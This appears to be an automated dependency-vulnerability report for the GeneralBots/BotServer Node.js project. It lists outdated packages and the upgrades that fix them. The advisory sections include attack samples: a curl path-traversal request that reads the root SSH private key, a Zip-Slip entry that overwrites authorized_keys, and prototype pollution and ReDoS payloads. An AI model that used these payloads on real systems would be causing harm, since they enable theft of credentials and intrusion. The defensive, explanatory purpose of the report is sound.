GeneralBots/BotServer

General Bot Community Edition open-core server.

Vulnerabilities: 13 (via 34 paths)
Dependencies: 792
Source: GitHub
Commit: 68ffecd5

Severity: 4 high, 4 medium, 5 low
Status: 13 open, 0 patched, 0 ignored

high severity (new)

Directory Traversal

  • Vulnerable module: adm-zip
  • Introduced through: textract@2.5.0

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 textract@2.5.0 epub2@1.3.4 adm-zip@0.4.16

Overview

adm-zip is a JavaScript implementation of zip data compression for Node.js.

Affected versions of this package are vulnerable to Directory Traversal: a crafted archive can cause files to be extracted outside the target folder.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating file paths with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note that %2e is the URL-encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create new files or overwrite existing ones. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ and overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys
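
One way to guard against such an archive during extraction is sketched below; it is a minimal sketch, assuming adm-zip's getEntries() and extractEntryTo() methods, and it simply refuses any entry whose resolved destination falls outside the target directory.

// Minimal Zip-Slip guard (a sketch, not the library's official mitigation).
const path = require('path');
const AdmZip = require('adm-zip');

function safeExtract(zipPath, targetDir) {
  const zip = new AdmZip(zipPath);
  const root = path.resolve(targetDir);
  for (const entry of zip.getEntries()) {
    // Resolve where this entry would land and make sure it stays inside targetDir.
    const destination = path.resolve(root, entry.entryName);
    if (destination !== root && !destination.startsWith(root + path.sep)) {
      throw new Error('Blocked path traversal attempt: ' + entry.entryName);
    }
    zip.extractEntryTo(entry, root, /* maintainEntryPath */ true, /* overwrite */ true);
  }
}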

Remediation

Upgrade adm-zip to version 0.5.2 or higher.

high severity

Prototype Pollution

  • Vulnerable module: extend
  • Introduced through: swagger-client@2.1.18

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 swagger-client@2.1.18 superagent@1.8.5 extend@3.0.0
    Remediation: Upgrade to swagger-client@2.1.20.

Overview

extend is a port of the classic extend() method from jQuery.

Affected versions of this package are vulnerable to Prototype Pollution. The utility function can be tricked into modifying the prototype of Object when an attacker controls part of the structure passed to it. This lets an attacker add or modify properties that will then exist on every object.
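
A minimal sketch of the attack pattern, assuming extend@3.0.0's deep-copy mode (extend(true, target, source)) and attacker-controlled JSON; the payload below is illustrative:

// Deep-merging attacker-controlled JSON can pollute Object.prototype on vulnerable versions.
const extend = require('extend');

const payload = JSON.parse('{"__proto__": {"isAdmin": true}}'); // hypothetical attacker input
extend(true, {}, payload); // the deep copy walks into __proto__

console.log({}.isAdmin); // true on vulnerable versions: every object now appears to have isAdmin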

Remediation

Upgrade extend to version 2.0.2, 3.0.2 or higher.

high severity (new)

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: marked
  • Introduced through: marked@1.2.5

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 marked@1.2.5
    Remediation: Upgrade to marked@2.0.0.

Overview

marked is a low-level compiler for parsing markdown without caching or blocking for long periods of time.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). Three or more groups of odd- and even-numbered consecutive underscores (___) followed by a character cause extended processing.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing a 30-character string takes around 52ms. But when given an invalid string of the same length, the test takes nearly two seconds to complete, roughly 35 times as long as it took to test the valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, the RegEx 101 debugger shows that the engine takes a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String             Number of C's   Number of steps
ACCCX              3               38
ACCCCX             4               71
ACCCCCX            5               136
ACCCCCCCCCCCCCCX   14              65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause the engine to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this behavior and cause the service to consume excessive CPU, resulting in a Denial of Service.

Remediation

Upgrade marked to version 2.0.0 or higher.

high severity

Prototype Override Protection Bypass

  • Vulnerable module: qs
  • Introduced through: swagger-client@2.1.18

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 swagger-client@2.1.18 superagent@1.8.5 qs@2.3.3
    Remediation: Upgrade to swagger-client@2.1.20.

Overview

qs is a querystring parser that supports nesting and arrays, with a depth limit.

Affected versions of this package are vulnerable to Prototype Override Protection Bypass. By default, qs protects against attacks that attempt to overwrite an object's existing prototype properties, such as toString(), hasOwnProperty(), etc.

From qs documentation:

By default parameters that would overwrite properties on the object prototype are ignored, if you wish to keep the data from those fields either use plainObjects as mentioned above, or set allowPrototypes to true which will allow user input to overwrite those properties. WARNING It is generally a bad idea to enable this option as it can cause problems when attempting to use the properties that have been overwritten. Always be careful with this option.

Overwriting these properties can impact application logic, potentially allowing attackers to work around security controls, modify data, make the application unstable and more.

In versions of the package affected by this vulnerability, it is possible to circumvent this protection and overwrite prototype properties and functions by prefixing the name of the parameter with [ or ]. For example, qs.parse("]=toString") will return { toString: true }; as a result, calling toString() on the object will throw an exception.

Example:

qs.parse('toString=foo', { allowPrototypes: false })
// {}

qs.parse("]=toString", { allowPrototypes: false })
// {toString = true} <== prototype overwritten
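
A minimal runnable sketch of the effect against the vulnerable qs@2.3.3 line, assuming its default parse() export; fixed versions behave differently:

const qs = require('qs');

const parsed = qs.parse(']=toString');
console.log(parsed);    // { toString: true } on affected versions
parsed.toString();      // throws: parsed.toString is not a function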

Disclosure Timeline

  • February 13th, 2017 - Reported the issue to package owner.
  • February 13th, 2017 - Issue acknowledged by package owner.
  • February 16th, 2017 - Partial fix released in versions 6.0.3, 6.1.1, 6.2.2, 6.3.1.
  • March 6th, 2017 - Final fix released in versions 6.4.0, 6.3.2, 6.2.3, 6.1.2 and 6.0.4

Remediation

Upgrade qs to version 6.0.4, 6.1.2, 6.2.3, 6.3.2 or higher.

References

  • GitHub Commit
  • GitHub Issue

medium severity

Server-Side Request Forgery (SSRF)

  • Vulnerable module: axios
  • Introduced through: botbuilder@4.11.0, botframework-connector@4.11.0 and others

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder@4.11.0 axios@0.19.2
    Remediation: Upgrade to botbuilder@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botframework-connector@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder-ai@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder-ai@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder@4.11.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-ai@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-azure@4.11.0 botbuilder@4.11.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder-dialogs@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder-dialogs@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder-ai@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder-ai@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-azure@4.11.0 botbuilder@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botbuilder-ai@4.11.0 botbuilder-dialogs@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
    Remediation: Upgrade to botbuilder-ai@4.11.1.
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-dialogs@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-ai@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-azure@4.11.0 botbuilder@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-azure@4.11.0 botbuilder@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 botlib@1.7.1 botbuilder-ai@4.11.0 botbuilder-dialogs@4.11.0 botbuilder-core@4.11.0 botframework-connector@4.11.0 @azure/ms-rest-js@1.9.0 axios@0.19.2
  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 ibm-watson@5.7.1 ibm-cloud-sdk-core@2.4.4 axios@0.18.1
    Remediation: Upgrade to ibm-watson@6.0.0.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). An attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.
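
If upgrading is not immediately possible, one defensive sketch (not the library's own fix) is to stop following redirects automatically and vet the Location target yourself; maxRedirects, proxy, and validateStatus are standard axios options, while the proxy host below is a hypothetical placeholder.

const axios = require('axios');

async function fetchThroughProxy(url) {
  const response = await axios.get(url, {
    proxy: { host: 'egress-proxy.internal', port: 3128 }, // hypothetical egress proxy
    maxRedirects: 0,                                      // never follow redirects blindly
    validateStatus: status => status < 400,               // treat 3xx as a normal response
  });
  if (response.status >= 300 && response.headers.location) {
    // Decide explicitly whether the redirect target is allowed before requesting it.
    throw new Error('Refusing to auto-follow redirect to ' + response.headers.location);
  }
  return response;
}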

Remediation

Upgrade axios to version 0.21.1 or higher.

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: marked
  • Introduced through: textract@2.5.0

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 textract@2.5.0 marked@0.6.2

Overview

marked is a low-level compiler for parsing markdown without caching or blocking for long periods of time.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The em regex within the src/rules.js file has multiple unused capture groups, which could lead to a denial of service attack if user input is reachable.

Details

For background on how catastrophic regex backtracking leads to Denial of Service, see the Details under the high-severity marked entry above.

Remediation

Upgrade marked to version 1.1.1 or higher.

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: marked
  • Introduced through: textract@2.5.0

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 textract@2.5.0 marked@0.6.2

Overview

marked is a low-level compiler for parsing markdown without caching or blocking for long periods of time.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The package may take quadratic time (or worse) when parsing malformed input, due to the _label subrule using backticks. This vulnerability was introduced in release 0.4.0 of the package.

Details

For background on how catastrophic regex backtracking leads to Denial of Service, see the Details under the high-severity marked entry above.

Remediation

Upgrade marked to version 0.7.0 or higher.

medium severity

Information Exposure

  • Vulnerable module: superagent
  • Introduced through: swagger-client@2.1.18

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 swagger-client@2.1.18 superagent@1.8.5
    Remediation: Upgrade to swagger-client@3.0.1.

Overview

superagent is a small, progressive client-side HTTP request library and Node.js module with the same API, supporting many high-level HTTP client features.

Affected versions of this package are vulnerable to Information Exposure due to sending the contents of the Authorization header to third parties.
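
A minimal defensive sketch while arranging the upgrade, assuming superagent's .redirects() API; the endpoint and token below are hypothetical. Capping redirects at zero keeps the Authorization header from being replayed to another host.

const superagent = require('superagent');

const token = process.env.API_TOKEN; // hypothetical credential

superagent
  .get('https://api.example.com/resource')   // hypothetical endpoint
  .set('Authorization', 'Bearer ' + token)
  .redirects(0)                              // do not follow redirects that could replay the header
  .end((err, res) => {
    if (err) return console.error('request failed:', err.status || err.message);
    console.log(res.status);
  });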

Remediation

Upgrade superagent to version 3.8.1 or higher.

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: harb
  • Introduced through: textract@2.5.0

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 textract@2.5.0 j@0.4.3 harb@0.0.7

Overview

harb is a parser and writer for various spreadsheet formats.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. Matching can take about 10 seconds for input 40k characters long.

Disclosure Timeline

  • Feb 19th, 2018 - Initial Disclosure to package owner
  • Feb 19th, 2018 - Initial Response from package owner
  • Feb 21st, 2018 - Fix issued
  • Feb 22nd, 2018 - Vulnerability published

Details

For background on how catastrophic regex backtracking leads to Denial of Service, see the Details under the high-severity marked entry above.

Remediation

There is no fix for harb, as this package is now maintained as xlsx.

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: mime
  • Introduced through: swagger-client@2.1.18

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 swagger-client@2.1.18 superagent@1.8.5 mime@1.3.4
    Remediation: Upgrade to swagger-client@2.1.20.

Overview

mime is a comprehensive, compact MIME type module.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). It uses the regex /.*[\.\/\\]/ in its lookup, which can cause a slowdown of about 2 seconds for a 50k-character input.
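
A rough timing sketch of the slow path, assuming mime@1.3.4's lookup() API; the input is an illustrative worst-case guess (a long string with no dot or slash), and actual timings will vary by machine.

const mime = require('mime');

const input = 'a'.repeat(50000); // no '.' or '/' forces the /.*[\.\/\\]/ prefix match to backtrack
console.time('lookup');
mime.lookup(input);              // noticeably slow on vulnerable versions
console.timeEnd('lookup');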

Details

For background on how catastrophic regex backtracking leads to Denial of Service, see the Details under the high-severity marked entry above.

Remediation

Upgrade mime to version 1.4.1, 2.0.3 or higher.

low severity

Denial of Service (DoS)

  • Vulnerable module: superagent
  • Introduced through: swagger-client@2.1.18

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 swagger-client@2.1.18 superagent@1.8.5
    Remediation: Upgrade to swagger-client@3.0.1.

Overview

superagent is a small, progressive client-side HTTP request library and Node.js module with the same API, supporting many high-level HTTP client features.

Affected versions of this package are vulnerable to Denial of Service (DoS). It uncompresses responses in memory, and a malicious user may send a specially crafted zip file which the server will then unzip, causing excessive CPU consumption. This is also known as a Zip Bomb.

Details

For general background on Denial of Service attacks, see the Details under the high-severity marked entry above.

Remediation

Upgrade superagent to version 3.7.0 or higher.

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: xlsx
  • Introduced through: textract@2.5.0

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 textract@2.5.0 j@0.4.3 xlsx@0.7.12

Overview

xlsx is a parser and writer for various spreadsheet formats.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). Matching can take about 2 seconds for input 50k characters long. This vulnerability is due to an incomplete fix for SNYK-JS-XLSX-10909.

Details

For background on how catastrophic regex backtracking leads to Denial of Service, see the Details under the high-severity marked entry above.

Remediation

Upgrade xlsx to version 0.16.0 or higher.

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: xlsx
  • Introduced through: textract@2.5.0

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 textract@2.5.0 j@0.4.3 xlsx@0.7.12

Overview

xlsx is a parser and writer for various spreadsheet formats.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. Matching can take about 10 seconds for input 40k characters long.

Disclosure Timeline

  • Feb 19th, 2018 - Initial Disclosure to package owner
  • Feb 19th, 2018 - Initial Response from package owner
  • Feb 21st, 2018 - Fix issued
  • Feb 22nd, 2018 - Vulnerability published

Details

For background on how catastrophic regex backtracking leads to Denial of Service, see the Details under the high-severity marked entry above.

Remediation

Upgrade xlsx to version 0.12.2 or higher.
